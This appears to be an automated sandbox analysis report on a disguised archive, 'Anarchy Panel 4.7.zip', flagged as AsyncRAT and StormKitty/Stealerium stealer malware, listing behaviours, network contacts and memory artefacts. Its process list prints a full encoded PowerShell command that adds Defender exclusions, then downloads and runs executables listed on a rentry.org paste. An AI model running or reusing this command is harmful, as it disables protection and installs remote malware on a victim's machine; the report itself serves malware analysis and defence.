Malware Analysis Report

2024-10-23 19:20

Sample ID 230625-lew6dsee8w
Target Anarchy Panel 4.7.zip
SHA256 5e840076dd200bff8e6a9f2abb94ea13196564c6d60e436d0c84cc148bce1b9a
Tags
rat asyncrat stormkitty stealerium
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5e840076dd200bff8e6a9f2abb94ea13196564c6d60e436d0c84cc148bce1b9a

Threat Level: Known bad

The file Anarchy Panel 4.7.zip was found to be: Known bad.

Malicious Activity Summary

rat asyncrat stormkitty stealerium

Async RAT payload

Stormkitty family

Stealerium family

Asyncrat family

StormKitty payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 09:27

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

Stealerium family

stealerium

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 09:27

Reported

2023-06-25 09:28

Platform

win10v2004-20230621-en

Max time kernel

34s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABhAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBkAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABkAGMAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAegB3AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAGkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAeABmAGgAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAZQB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB0AGkAegAjAD4A"

Network

Country Destination Domain Proto
US 8.8.8.8:53 229.78.74.40.in-addr.arpa udp
US 8.8.8.8:53 rentry.org udp
LU 198.251.88.130:443 rentry.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 130.88.251.198.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 13.89.179.8:443 tcp

Files

memory/3420-133-0x0000000005290000-0x00000000052C6000-memory.dmp

memory/3420-134-0x00000000059B0000-0x0000000005FD8000-memory.dmp

memory/3420-135-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-136-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-137-0x00000000058C0000-0x00000000058E2000-memory.dmp

memory/3420-138-0x0000000006150000-0x00000000061B6000-memory.dmp

memory/3420-141-0x0000000006230000-0x0000000006296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckmfjvjs.awg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3420-149-0x0000000006850000-0x000000000686E000-memory.dmp

memory/3420-150-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-151-0x0000000007820000-0x0000000007852000-memory.dmp

memory/3420-152-0x0000000070400000-0x000000007044C000-memory.dmp

memory/3420-162-0x00000000077E0000-0x00000000077FE000-memory.dmp

memory/3420-163-0x00000000081E0000-0x000000000885A000-memory.dmp

memory/3420-164-0x0000000007BA0000-0x0000000007BBA000-memory.dmp

memory/3420-165-0x000000007FDC0000-0x000000007FDD0000-memory.dmp

memory/3420-166-0x0000000007BF0000-0x0000000007BFA000-memory.dmp

memory/3420-167-0x0000000007E40000-0x0000000007ED6000-memory.dmp

memory/3420-168-0x0000000007DD0000-0x0000000007DDE000-memory.dmp

memory/3420-169-0x0000000007E20000-0x0000000007E3A000-memory.dmp

memory/3420-170-0x0000000007E10000-0x0000000007E18000-memory.dmp

memory/3420-171-0x0000000008010000-0x0000000008032000-memory.dmp

memory/3420-172-0x0000000008E10000-0x00000000093B4000-memory.dmp

memory/3420-173-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-174-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-175-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3420-176-0x000000007FDC0000-0x000000007FDD0000-memory.dmp